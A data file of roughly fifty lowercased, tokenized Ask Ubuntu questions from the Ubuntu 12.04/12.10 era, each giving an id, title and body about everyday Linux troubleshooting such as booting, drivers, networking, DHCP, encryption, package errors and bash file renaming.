201568	how to move only a specific amount of images from a folder	i have a folder that has 200.000 images . i want to do the following : move an x amount of images ( 50 images , 100 images , 200 images ) from that folder to y folder . each y folder can be a number ( folder 1 , folder 2 , folder 3 ... ) . the end result might look like this : folder 1 ( has x amount of images ) folder 2 ( has x amount of images ) folder 3 ( has x amount of images ) folder 4 ( has x amount of images )
201571	i have a live usb of lubuntu , and want to make it persistent to the same usb . can i do that ?	i do n't have access to a blank cd , so i 'm booting via live usb . the problem is i ca n't partition that drive when it 's running my os , or i think that 's the problem . is there a way to convert the install on the usb disk to persistent ? if not i could get hold of an empty usb , but if it 's possible this would be a lot easier . thanks in advance for any responses ! : )
201572	how to encrypt php folder under /var/www ?	i need to encrypt the folder /var/www/test . the folder contains php files . the goal it to prevent any user to read the php content and if the hd is mounted on another computer , the /var/www/test should be encrypted and if computer booted up without any user logged i would like anyone to be able to access data in /var/www/tests . what is the correct approach for this ? i 've tried `` ecryptfs-setup-private '' as advised in how to encrypt /var/www ? yet it did n't work for me . i 've might missed something - i 've tested the folders while booting with ubuntu 12.04 installation disk and mounted the drive , than i was able to access /var/www/test content.. yet this is what i want to prevent . the gnome-encfs is n't the way to go since its decryption happens when users logs on to the system & i would like the system to be working after power failure etc ' without any one logged in . please advice .
201573	how to permanently mount a samba share in 12.04 ( gnome-shell 3.4 ) ?	currently i have a number of share folders that i am using as a very simple home server for media and other files . this works for a manual mount every time - like clock work : sudo mount -t cifs //192.168.1.121/mymusic /media/mymusic -o username=majikwah , password=br6adigo however , i have to mount these every time i reboot . is there a way to mount permanently ? i have poked around with a few solutions found here , but i think i got in over my head in editing the fstab . any thoughts , suggestions would be helpful .
201575	wifi network is not working	i 'm having trouble connecting to wifi modem . i can connect easily in windows , but in ubuntu it can only connect over wired network . i have a fair knowledge of networking using windows , but not with ubuntu . i do not understand what the issue may be . my wifi card is compatible with linux os . what should my troubleshooting steps be ?
201576	screen tab completion	is it possible to make the terminal behave like screen when it comes to tab completion ? in screen , when you press tab , it gives the possible completions just below , but does n't display the prompt again , instead , continues in the same prompt .
201577	after suspend icons are blurry	after i resume from suspend mode the icons on the desktop are blurry . i have tried to solve this with `` additional drivers '' and also my graphics card ( nvidia ) is capable of rendering which i checked through terminal . what could be the cause of this ? i am pretty sure its up to the graphics card ... but could it be an ubuntu issue ? i use suspend a lot so this is really annoying as i have to constantly restart the computer . i also tried this in 2d mode but sometimes it works . here is a picture http : //i1294.photobucket.com/albums/b606/ed-2012/afterresume_zps64345217.png
201579	unknown filesystem error	my computer has ( had ) a dual boot of ubuntu precise and windows 7 . recently , when i started the computer , grub gave me an error saying `` unknown filesystem '' , and sent me to grub rescue . i searched for solutions to this , and found this answer : unknown filesystem error : grub rescue . i followed the instructions there , but they did n't really help : when i restarted the computer , it went straight to windows without grub intervening at all ( so it boots successfully , just not to the os i want ) . this is the log from boot-repair . my ubuntu partition is sda6 . naturally , i 'm a little worried , since the log says `` unknown filesystem type '' '' , which to me looks like the partition might be corrupt somehow . from the ubuntu live cd , i started gparted and looked at my partitions , and it also told me that my sda6 is an unknown filesystem . so my questions are basically : can i restore ubuntu to the way it was ? if not , can i at least rescue the data i had on the partition somehow ? again , if i ca n't restore ubuntu , how do i clean everything up so that i can reinstall it without too many complications ? another thing i should mention is that yesterday i had a similar problem where the computer told me there was a problem with the hard drive when it was starting , but it fixed itself by running fsck ( that time it got past grub , and managed to start ubuntu ) . between that occasion and me having trouble booting the computer today , i have booted it successfully at least twice . thanks for any help ! edit : since i got the popular question badge for this , i might as well add for anyone looking that the computer 's hard drive was just broken and i had to replace it . i guess it was unsalvageable .
201580	tuxonice wo n't resume	i 'm trying to setup hibernate on my new rig , and i 've gotten tuxonice working a few times , but then i had a failed hibernate , and sense then , i ca n't resume from a hibernate . tuxonice has the loading bar , and the text interface , and successfully brings the computer into hibernate . however when resuming from hibernate , the screen stays black , then displays random pixels everywhere , and hangs . i 'm running it from command line with sudo pm-hibernate . i 've tried setting resume=/dev/sda3 in /etc/default/grub followed by sudo update-grub , but it did n't make a difference . what am i doing wrong , or how can i successfully hibernate with a near 100 % success rate ? update 1 i just looked at /etc/log/pm-suspend.log and here are the last two lines of the log file : /usr/lib/pm-utils/sleep.d/95hdparm-apm thaw hibernate : success . running hook /usr/lib/pm-utils/sleep.d/9 from my limited knowledge , it looks to me like some sort of hand error in sleep.d . is this the cause , and if so , what can i do to fix it ?
201581	does not boot after install , my troubleshooting and google fu have failed me	i can only get an install to `` stick '' if i use shred to zerofill my drive first . otherwise , when i install ubuntu or lubuntu 12.04 , i will get `` grub rescue : out of disk '' . with the aforementioned ( completely default ) install on top of a zerofilled drive , then rebooting after installing updates will tell me there is no operating system . i do n't even get to grub . installing on top of the failed install , while choosing `` erase ubuntu 12.04 and reinstall '' , i get the grub rescue : out of disk error . the hard drive has been repeatedly tested and does not have any read or write errors . i 've used check disk for errors on the pen drive i 'm installing from and it comes up clean as well . the system is an inspiron 6000 , with 1gb ram and a 250 gb hard drive . i 'm typing this from a live cd on the same machine . what gives ?
201589	slow performance after fixing geforce driver problem	i 'm using ubuntu 12.04 lts on asus k43 ; memory 5.8 g.b . ; processor intel core i7 cpu @ 2.00 ghzx8 ; graphics : geforce gt 540m/pcie/ssf2 ; os type : 64 bit and disk 26.4 g.b . i faced a problem ( black screen ) after updating my geforce driver . the issue has been solved using the following command jockey-text -e xorg : nvidia_current , however , the system performance seems considerably slow comparing it with the previous state ( before the geforce driver problem ) specially at start up it takes more time than before and the resolution is less as well . is there away to fix this please ? regards .
201598	why is n't there just a plain youtube scope in video lens	why is n't there a regular youtube scope in dash ? there is only youtube education and youtube movies i think
201602	how do i work around sudo 'segmentation fault ' on basic bash commands ?	i am sure the answers are out there , but alas there are too many answers ( here and elsewhere ) to other questions stopping me from finding them . i just encountered something substantially similar to what is described at the closed so question , sudo : âsegmentation faultâ ubuntu maverick [ closed ] . my team is using ubuntu 11.04 on vmware workstation 8.0.4 . we are doing development using c++ , xenomai , qt , and qt creator . when we simulate our application on the virtual machine , we currently need to launch qt creator with sudo . my colleague mentioned today that he has been having issues where his workstation locks up and he needs to restart and that occasionally he has the issue that all sudo bash commands return `` segmentation fault '' . i just ran our application in simulation mode . i was running qt creator under sudo and qt creator received the signal abort ( if i recall ) . afterward , every command executed with sudo from sudo qtcreator to sudo ls resulted in the message segmentation fault . i clicked on the power widget to see if i could log out , but the system shut down straightaway without prompting . my understanding is that we run sudo because of a permissions issue with xenomai and the vm as currently configured , but my colleague has a workaround for this . i expect that not running qt creator under sudo -- something that has always made me nervous -- will help contain this issue , but i find it troubling that this could happen and manifest as it does . does anyone know what is happening ? any recommendations on how to work around this issue ? this is happening often to i am trying tolobby for vm changes to be able to run the process without sudo .
201603	how do i edit my resolv.conf file to fix wrong dns problem ?	i have the problem that my ubuntu machine uses the wrong dns server . for some reason the machine queries localhost for dns information . i have added the dns server in the network settings gui , but /etc/resolv.conf still contains 127.0.0.1 as the dns server address . now , i tought i could just edit the file by myself , but it explicitly says i should not edit the file by hand . now , since the network settings gui did n't generate the file with the right settings , how do i generate a new resolv.conf file by myself ?
201606	how to create rings when installing swift on ubuntu 12.04 ?	i am installing swift object-server on ubuntu 12.04 machine and getting some problems . i 've got following error when installing swift : ioerror : [ errno 2 ] no such file or directory : '/etc/swift/object.ring.gz' i am not getting how to create/decide zone , device and use it in following command : swift-ring-builder account.builder add z < zone > - < storage_local_net_ip > :6002/ < device > 100 swift-ring-builder container.builder add z < zone > - < storage_local_net_ip_1 > :6001/ < device > 100 swift-ring-builder object.builder add z < zone > - < storage_local_net_ip_1 > :6000/ < device > 100 i tried with device as /dev/sda1 ( this is primary partition on my m/c , i have another extended partition /dev/sda2 on m/c but do n't know how to decide a device ) , and zone as 1 ( even i do n't know how to decide a zone ) . please refer to the this link : openstack-swift installation & configuration ubuntu 12.04 can anybody help me out to decide device and zone ? i think that these must be the only incorrect things i am using so rings are not getting generated . any suggestions are greatly appreciated .
201612	dual boot installation error `` no root file system is defined '' for 12.04 lts	i am trying to install ubuntu 12.04 using wubi.exe from within windows 7 . all goes well but when it restarts and installation proceeds it gives and error `` no root file system defined '' . i have tried booting from live usb and live cd but the same error occurs . then i downloaded 11.10 version and booted into it using live usb but same error occurs there . now the thing is that i have 4 partitions on hard disk : 1- c : 147gb ( with windows 7 installed ) 2- d , e which i use for file storage in windows 3- g : 19gb ntfs formatted from windows i am trying to install ubuntu into this g drive . i want to keep my windows 7 files and installation intact . i have tried it a while ago for 11.10 and at that time it all went super smooth . i have tried rebuilding the partition table from cmd.exe in windows and i have also tried by formatting my g drive to ext3 using easeus partition manager in windows and then installing using wubi but wubi.exe did n't detected the partition formatted to ext3 . when i ran the installation wizard from within ubuntu running through live usb , i got a window with device= /dev/sda and no type no size nothing . here when i choose my 320gb drive it just gives the option as in picture and when i pressed install the same error `` no root file system defined '' . i have tried to select the new partition table option but it give me the window to create a partition by dividing 320gb whole into whatever i want . i do n't proceed into that option because i think i will ruin my windows 7 stuff . i am posting the pictures at of installation steps i have defined in the following link please have a look . please help me !
201627	apt-get update : 503 service unavailable	i do get the following error message ( s ) when running apt-get update : err http : //nl.archive.ubuntu.com precise-backports/multiverse i386 packages 503 service unavailable the server is not behing a proxy , but there is a firewall , i suspect that the firewall is causing me troubles ( transparant proxy ? ) . what kind of checks can i perform to be sure it is the firewall and not something else ? which specific ports should i check in which way to get conclusive evidence ?
201629	how can i use up all ram by cache ?	i am using ubuntu 12.10 with 4g ram . i have changed swap to 10 and installed preload . however , my system only use less than 1g ram to cache and it remains more than 2g ram standby . how can i use up all ram by cache ? by this , i want to speed up open and run applications . thank you .
201631	how do i install nautilus 3.6 in 12.10 ?	i like new version of nautilus ( 3.6 ) , but ubuntu 12.10 shipped with 3.4 so how can i install version 3.6 in ubuntu 12.10 ?
201634	moving ubuntu server installation from flash drive to hdd via ssh	i am wanting to move my ubuntu server installation from the usb flash drive to a more permanent location on a hdd on my nas . i initially installed ubuntu server on the usb drive as a test but it has grown into a fully configured server . the catch is that the server has no keyboard , monitor or dvd drive and is only accessible via ssh - so i think that makes something like clonezilla unusable ? apart from the usb drive there is also an internal hdd that contains a zfs pool with a few bits on it and 2 more larger hdd on the way . i would like to move the usb drive setup to the current internal hdd and make it bootable , all using ssh . any suggestions ?
201638	postgresql fails to start on ubuntu 10.04.4 lts	i installed postgresql 9.2 from add-apt-repository ppa : pitti/postgresql using apt-get install postgresql-9.2 at the end of the install and every time i try to launch postgresql by using the following command /etc/init.d/postgresql start or service postgresql start i get this error : error : could not exec /usr/lib/postgresql/9.2/bin/pg_ctl /usr/lib/postgresql/9.2/bin/pg_ctl start -d /var/lib/postgresql/9.2/main -l /var/log/postgresql/postgresql-9.2-main.log -s -o -c config_file= '' /etc/postgresql/9.2/main/postgresql.conf '' : [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . dpkg : error processing postgresql-9.2 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : postgresql-9.2 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have tried everything found here : how to thoroughly purge and reinstall postgresql on ubuntu and here : eliminating non working postgresql installations on ubuntu 10-04 and starting af . i have also done dpkg -p -- force-remove-reinstreq postgresql-client-9.2 in my attempt to remove everything postgres related from my server . after removing postgresql i have used dpkg -- get-selections | grep postg to be sure there is nothing left and i can do a clean install . i have also made sure that the files and folders mentioned in the error message have the right permissions . the /var/log/postgresql/postgresql-9.2-main.log file is empty . i have tried installing every postgresql version from 8.3 to 9.2 and i get the same error on every time . i once managed to compile postgresql from the source provided on their website but then i encountered weird errors with psycopg2 so i figured i 'd install postgresql this way and avoid those errors . also when i type apt-get install postgresql it by default tries to install the 8.3 version even when i can find the package by typing apt-get install postgresql-9.2 .
201643	is there a https server for official ubuntu releases ?	is there an https download available of ubuntu isos ?
201645	hp pavilion dm4-1160us black screen while booting	after installing ubuntu 12.04 on hp pavilion dm4-1160us , it first boots by showing a purple screen and goes into a black screen . what could be happening please ?
201648	no read/write permission as user on a secondary drive	i have a 2nd hard drive that is used for data only , it has been formatted both in ntfs and fat32 , the system is dual booted with windows so the data drive is used to share data between win and ubuntu . however in ubuntu with the user account set as limited user , i can not do anything with the files , namely create files , edit names , move them , modify etc . but i can do all that fine with the admin account . i 've tried changing permissions , ownership , installing ntfs plugins etc . nothing seems to work . did n't have this problem in the old ubuntu 10.04 . i 'm currently running on 12.04 lts cheers
201649	tcl8.4-dev dependency problems	i got a problem when installing gperf . it looks like this '' dpkg : dependency problems prevent configuration of tcl8.4-dev : tcl8.4-dev depends on tcl8.4 ( = 8.4.16-4ubuntu1 ) ; however : version of tcl8.4 on system is 8.4.19-4ubuntu3 . dpkg : error processing tcl8.4-dev ( -- configure ) : dependency problems - leaving unconfigured '' does anyone know how to fix this ? thank you
201658	epson stylus sx420w does n't print due to `` printer needs epson-espcr-wrapper package before printing . '' error	i 'm trying to install epson stylus sx420w . i have ppd file , i connect printer with usb and install it with ppd . it recognizes printer and install it but it gives this message printer needs epson-espcr-wrapper package before printing . install it.. what is epson-espcr-wrapper package ? how can i install it ?
201662	difference between sh file.sh and file.sh	i have two questions : what is the difference between executing sh filename.sh and filename.sh ? how can i make both of them giving me the same output ? i 'm asking this question as right now i 'm facing a problem . i 'm trying to run a java + swt application from terminal . when i do filename.sh , it gives me the desired output . but when i do sh filename.sh or bash filename.sh , it throws me an error : exception in thread `` main '' java.lang.noclassdeffounderror : mainform/java caused by : java.lang.classnotfoundexception : mainform.java at java.net.urlclassloader $ 1.run ( urlclassloader.java:202 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:190 ) at java.lang.classloader.loadclass ( classloader.java:306 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:301 ) at java.lang.classloader.loadclass ( classloader.java:247 ) could not find the main class : mainform.java . program will exit . i know this question is already asked here but i 'm still not clear about it . i have gone through the following links : what is the difference between ./ and sh to run a script ? can scripts run even when they are not set as executable ? can anyone help me with this ?
201664	messaging menu missing after upgrade to 12.10	upgraded from 12.04 to 12.10 today , and the messaging menu is missing . might be because the only application that i use with the messaging menu is pidgin . is this an issue where pidgin has not been integrated with 12.10 ? i am assuming here that the messaging menu is hidden when no application is using it . what can i do to integrate pidgin with the messaging menu and get it back ?
201672	after booting ubuntu on usb every files lost from desktop on next boot	i have booted using “try ubuntu without installing” after booting from liveusb , i am copying some files from harddisk to ubuntu desktop , but on next boot i ca n't get those files . please help me how i can transfer files from other hdd drive to my booted ubuntu usb drive for later use .
201676	no dbcouch in evolution , where did it go ?	after installation of 12.04 lts i have no dbcouch in evolution addressbook , so no synchro of contacts . synchro with other maps and ubuntu one is ok .
201677	switch to specific keyboard layout using ctrl+shift+num	what i want is to be able to press : ctrl + shift + 1 - switch to english keyboard layout ctrl + shift + 2 - switch to hebrew keyboard layout ctrl + shift + 3 - switch to russian ( phonetic ) keyboard layout i 've seen similar questions already asked here , but only answers i saw used setxkbmap which breaks the ui keyboard layout selector , which is something undesired . thanks for any help .
201681	'failed to apply network settings	when i restart my computer i found a strange error related to blue-tooth . error is : failed to apply network settings org.freedesktop.dbus.error.spawn.permissionsinvalid : the permission of the setuid helper is not correct you might not be able to connect to the bluetooth network via this machine . my system is dual boot . one os is ubuntu 12.04 and another is windows 7 . when i used to shutdown my system from ubuntu i am getting ubuntu login screen . also i am unable to see the another drives of hard disk in ubuntu . also if i insert the pendrive i have to mount it using command line . otherwise pendrive is not visible . also wi-fi is not working . please help me out
201682	font rendering issue in gtk based applications , ( firefox , gimp ) ?	i am experiencing an issue with font rendering issue in gtk based applications ( for example ; firefox , gimp ) . i 've read a bunch of google answers about this , but have n't figured out yet what to do . it is clear that something is wrong with the gtk theme , but what ? as you can see from the below screenshot of firefox , both the text on the page and the menu characters are rendering incorrectly : any ideas on how to resolve this issue ?
201688	google online account is always asking for access grant	when i open my user session in ubuntu 12.10 , system settings tray icon in top panel is always in red mentioning that some online account needs internet access grant . yet , it 's always google and only google . i granted it access many times but it 's not persistent . either connected to internet or not , this behavior remains . this being a bug ; does anyone have some workaround ?
201691	removing numbers and hyphens from file names recursively	i am modifying a simple bash script to remove numbers and hyphens from the start of my mp3 files . the aim is to rename files such as : 11 song 1.mp3 1-1-song 2.mp3 11-1 song 3.mp3 to : song 1.mp3 song 2.mp3 song 3.mp3 i have this script which works for all the files in the current directory $ for f in [ 0-9 ] * ; do mv `` $ f '' `` `echo $ f | sed 's/^ [ 0-9 ] *\w*//'` '' ; done and have modified it to look for all files inside subfolders : # ! /bin/bash dir= '' ifs=' ' for f in $ ( find $ dir * -type f ) ; do mv `` $ f '' `` `echo $ f | sed 's/^ [ 0-9 ] *\w*//'` '' ; done the problem is that the $ f value returns the subfolder and the filename and the mv line looks for files beginning with [ 0-9 ] , therefore any files within a subfolder are not being renamed . e.g . the file mp3/1-1 song 1.mp3 begins mp3/ , does not start with a numeric so it 's not renamed . is there a way i can read the directory and file values into separate variables or is there a better way of doing this ? thanks
201692	will i be able to upgrade ubuntu 12.04 unity to 12.10 version ?	will there be upgrade for unity ( 6.8.0 ) 12.04 to the same version of 12.10 ?
201699	merge many folders keeping most recent files ?	i have 102 directories that i would like to merge into a single directory . if there are conflicts i would like to use the most recent file . how can i do this ? previously i 've tried searching for the folders then copying them into the same parent directory , since the directories i want to merge have the same name it asks if i want to merge them . however it does n't have an option to automatically keep the most recent file .
201706	how can i make apt-get upgrade the kernel , similarly to aptitude ?	installed new ubuntu server 12.04 on windows azure after apt-get upgrade , console shows : the following packages have been kept back : linux-image-extra-virtual linux-image-virtual linux-tools linux-virtual ( ... ) 83 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . need to get 64.5 mb of archives . after this operation , 714 kb of additional disk space will be used and after aptitude upgrade the following new packages will be installed : linux-image-3.2.0-32-virtual { a } linux-image-extra-3.2.0-32-virtual { a } linux-tools-3.2.0-32 { a } ( ... ) the following packages are recommended but will not be installed : libglib2.0-data shared-mime-info shared-mime-info : i386 87 packages upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 103 mb of archives . after unpacking 151 mb will be used . so there is difference between the two . could you please advice what i should choose to upgrade my server ? is there any advantages of upgrading additional packages via aptitude or i should stay with apt-get and upgrade less packages ?
201708	swf player aware of file changes	i 'm looking for a .swf player that would reload an already opened file if its content changed . alternatively one that would work in one-instance only way so when i call it again with a new file i would have the desired effect . as in : gnash first_file.swf ... gnash new_file.swf ending up with only one window . i have an overly complicated solution ready with a bash script checking the file size changes , killing old instance and reinitializng the program but i 'm curious whether there is a more elegant solution .
201713	ubuntu 12.04 not displaying dvd drive	i 'm new to ubuntu and linux in general . after installing it and seeing that most of the stuff runs like i 'm used to on windows , but then there are some things that keep arising and i have to solve , so far this is the first i 've needed help on : i put a dvd-rw into my drive which is just a bunch of backed up files , the drive whirred away and eventually popped up nautilus which displayed two folders with white icons 1 's and 0 's on them . i clicked on the file and found out they were not associated with any package , i also noted that there was no reference to dvd in the devices list . any idea on what is happening here ? did i foget to install something ? thanks for any help . the last few lines read : [ 790.336832 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 800.760279 ] wlan0 : no ipv6 routers present [ 889.816022 ] udf-fs : partition marked readonly ; forcing readonly mount [ 889.847830 ] udf-fs : info mounting volume 'tjs_miscstuff_1 ' , timestamp 2006/10/10 11:53 ( 103c )
201720	how to store sensitive information ( passwords ) so it can be accessed by cronjob ?	i 'm writing an extension to a python program that will need to store passwords and need to access them during non interactive cronjobs ( during the user is not logged in ) . my first approach was to use seahorse to store the password . but seahorse is not accessible when the user is not logged in , is it ?
201721	fixing broken eclipse ubuntu 12.04	after updating some plugins my eclipse indigo stopped working properly in ubuntu 12.04 . now i no longer can create c++ projects or open cpp files ( due to some error in org.eclipse.cdt ) . i have tried to run a sudo apt-get purge eclipse* and reinstall it using sudo apt-get install eclipse-cdt , but that did n't solve the issue . is there a way i can completely clean eclipse and reinstall it ?
201724	where are bug reports saved ?	where are bug reports from ubuntu-bug saved ? or how can i upload ubuntu-bug files as further information in launchpad ?
201727	how can i make dropbox display an icon in gnome shell ?	there 's no icon of dropbox in the gnome-shell 's tray ( bottom-right corner ) . there 's just text . i tried different icon themes but still it 's missing . here 's a screenshot :
201728	how to add a web app to ubuntu 's repositories ?	according to this question , some webapps like gmail are now `` install-able '' . i 'm the developer of timer-tab.com and have already integrated it with the unity desktop using the unity web api . are there any plans to allow web developers to add their app to the repositories so that one can do apt-get install unity-webapps-timertab ?
201739	world of warcraft - poor performance	first , i havent used linux for 4-6 years . im pretty noob to all the new stuff . i have latest ubuntu , with all the updates . and 1.4 wine . i have pre-installed wow , on my windows partition . im trying to run it with wine , but the performance is really poor , and im low on colors . also getting graphic errors ingame . im using integrated gpu hd4000 ( i5 3570k ) is any tweaking required , or do i have to install drivers.. ? everything else is running well on the gpu ( youtube , movies etc.. )
201744	swap encryption and hibernating	i run ubuntu 12.04 on my laptop , with an encrypted home folder + swap partition . before i had this encrypted setup , i used to have my hibernation enabled . i found this documentation on how to enable hibernation with an encrypted swap . now the thing that bothers me by using the solution as given in the documentation , is that apart from having to type my password to login to my user account , i have to type separately a password to mount my swap partition . a possible solution to this is ( is it ? ) to enable my user account to automatically login ( so as to skip the login screen ) and view the mounting of the swap partition as an alternative login screen . note that i am the only user of my laptop . the only drawback to this method is that after 3 password attempts the system anyway continues booting , though without mounting the swap partition . leaving my desktop freely available to anybody . as i would like to use hibernation while having only to type my password once at startup , my question thus is whether it be possible to : or make the password-attempt count infinite or alternatively let the system reboot itself after three attempts ( starting the cycle over again ) and if this is possible whether it would pose a security breach not thought of by me and if not possible : whether there would be another creative alternative allowing me and other users to use hibernate in combination with encryption without having to type two pass phrases at boot . thank you very much for any help !
201746	dhcp server with multiple interfaces on ubuntu , destroys default gateway	i use ubuntu , and i have many interfaces . eth0 , which is my internet connection , and it gets its info from a dhcp-server totally outside of my control . i then have eth1 , eth2 , eth3 and eth4 which i have created a dhcp-server for . ( isc dhcp-server ) it seems to work , and i even get an ip-address from the foreign dhcp-server on the internet facing interface . however , for some reason it seems my gateway for eth0 became screwed after i installed my local dhcp-server for eth1-eth4 . ( i think so because i got an ip for eth0 , and i can ping other stuff on the local network , but i can not get access to the internet ) . my eth0-specific info in /etc/network/interfaces : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 10.0.1.1 netmask 255.255.255.0 network 10.0.1.0 broadcast 10.0.1.255 gateway 10.0.1.1 mtu 8192 auto eth2 iface eth2 inet static address 10.0.2.1 netmask 255.255.255.0 network 10.0.2.0 broadcast 10.0.2.255 gateway 10.0.2.1 mtu 8192 my /etc/default/isc-dhcp-server : interfaces= '' eth1 eth2 eth3 eth4 '' so why does my local dhcp-server mess up the gateway for eth0 , when i tell it not to listen to eth0 ? anyone see the problem or what i can do to fix it ? the problem seems indeed to be the gateways . netstat -nr gives : 0.0.0.0 -- - 10.x.x.x -- -- 0.0.0.0 -- - ug 0 0 0 eth3 it should have been 0.0.0.0 129.2xx.x.x 0.0.0.0 ug 0 0 0 eth0 so for some reason , my local dhcp-server overrides the gateway i get from the network dhcp . edit : dhcp.conf looks like this ( i included info only for eth1 subnet ) : ddns-update-style none ; not authoritative ; subnet 10.0.1.0 netmask 255.255.255.0 { interface eth1 ; option domain-name `` example.org '' ; option domain-name-servers ns1.example.org , ns2.example.org ; default-lease-time 600 ; max-lease-time 7200 ; range 10.0.1.10 10.0.1.100 ; host camera1_1 { hardware ethernet 00:30:53:11:24:6e ; fixed-address 10.0.1.10 ; } host camera2_1 { hardware ethernet 00:30:53:10:16:70 ; fixed-address 10.0.1.11 ; } } also , it seems that the gateway is correctly set if i run /etc/init.d/networking restart in a terminal , but that 's not helpful for me , i need the correct gateway to be set during startup , and i 'd rather find the source of the problem
201748	continue without a default route ?	i have to do a complete unattended installation of a node with ubuntu12.04 . i have given following options in preseed file d-i netcfg/choose_interface select eth0 d-i netcfg/disable_dhcp boolean true d-i netcfg/dhcp_failed note d-i netcfg/dhcp_options select configure network manually d-i netcfg/disable_autoconfig boolean true d-i netcfg/use_autoconfig boolean false d-i netcfg/network-manager boolean false d-i netcfg/no_default_route boolean true d-i netcfg/enable boolean true d-i netcfg/get_ipaddress string 192.168.1.103 d-i netcfg/get_netmask string 255.255.0.0 d-i netcfg/confirm_static boolean true still d-i is asking `` continue without a default route ? `` , i have to say yes manullay . how can i preseed this while d-i configure the network even after setting default gateway & name server still the same .
201749	how to install cdm ?	i would like to replace the default login manager that comes with ubuntu with cdm . how can i do that and what problems can i expect ?
201750	saving virtualbox state during dist-upgrade ?	i am wondering if i am going to do any harm to my virtual system if i save it 's state and close the vm while it is in the middle of a dist-upgrade ? afaik saving the state allows you to resume it with the system being unaware that anything has even happened , so am i safe to save state and close ?
201756	no results in music lens ! music files appear in file lens !	i am running ubuntu 12.04 unity -- - almost default install . about two weeks back i populated my music folder with a lot of music files ( mp3s ) . when i go to file lens ( super f ) , and search i get to see all the music files matching the criteria . the files have a music file icon . when i go to music lens ( super m ) , and search , i get no results ! how can i get the 'normal ' , expected behavior ?
201759	firefox - itunes application detector	in my firefox under plugins i have a `` itunes application detector '' . i know , i can disable it but how to remove it ? btw . how could it get there ? was it eventually restored by firefox sync ? anyway , there is no itunes in linux and i dont use itunes . so how to get rid of it ?
201760	dvd rom with interactive uni activities wo n't install on ubuntu	i have just started an open uni degree and been supplied with a dvd rom which has interactive activities , including video and audio to watch/listen to . apparently you have to `` install '' the dvd and you can then save your progress on each of the activities . according to the documentation i 've been sent , it will only play on windows and their it helpdesk ca n't give any advice about mac or linux ( dead helpful , thanks ) . i only have a laptop with ubuntu on it . i do have access to a windows machine at work but i do n't really want to use that unless i absolutely have to for my uni work . other dvds all work fine . can anyone help with the `` installation '' of this ? i 'm not very linux-savvy unfortunately so i 'm just researching as i 'm coming across things i ca n't do . thanks in advance . clare .
201762	ubuntu 12.04 , october 2012 update , black login screen	my ubuntu 12.04 was working just fine until the last update , after that everytime i login the display turns black , i hear the login sound and i can only use the notebook with an external monitor . dell latitude e5510 with integrated hd display . $ lspci 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1c.2 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 3 ( rev 05 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 05 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a5 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 05 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 05 ) 02:00.0 network controller : intel corporation centrino advanced-n 6200 ( rev 35 ) 03:00.0 cardbus bridge : ricoh co ltd device e476 ( rev 02 ) 03:00.1 sd host controller : ricoh co ltd mmc/sd host controller ( rev 03 ) 03:00.4 firewire ( ieee 1394 ) : ricoh co ltd r5c832 pcie ieee 1394 controller ( rev 03 ) 0b:00.0 ethernet controller : broadcom corporation netxtreme bcm5761e gigabit ethernet pcie ( rev 10 ) 3f:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 02 ) 3f:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 02 ) 3f:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 02 ) 3f:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 02 ) 3f:02.2 host bridge : intel corporation core processor reserved ( rev 02 ) 3f:02.3 host bridge : intel corporation core processor reserved ( rev 02 ) the display is turned on but it 's all black . so far i re installed only the / partition and disabled the updates . i tried it 3 times and it happened every single install . thanks .
201768	gnome3 freezes/unresponsive	i find that gnome3 , after some period of time , freezes completely . the cursor is the only thing that responds . i find that logging in from another machine , and issueing a kill -1 to the gnome-shell process will temporarily give me response . but after 5 or so minutes , it begins freezing/unfreezing in a cyclical fashion , and quickly returns to a completely unresponsive state . by freezing , i mean just that . gkrellm is frozen . so are clocks , and anything else that would normally show updates.h mouse cursor still moves , but keyboard , mouse buttons show no responses . some mornings , i come back to my system , and it is frozen , so i ssh in , and there is no longer any x server running at all ! i reboot the machine in that case . otherwise , if lightdm , gnome-session , and gnome-shell are still running , kill -1 to the head gnome-shell ( use pstree -plg ) will give you enough response to save any work , and then log out to start the session over . it seems ( this may be purely superstition ) that running firefox accelerates the breakdown . i usually have more than a few tabs open ; i have konsole and terminal both running with maybe 5 tabs open on konsole , and 20 tabs open on terminal . i have a 6-core amd 64-bit processor ; 8 gig of memory ; a geforce gt520 dual-monitor setup ; running 64-bit ubuntu 12.04 ; what gives ?
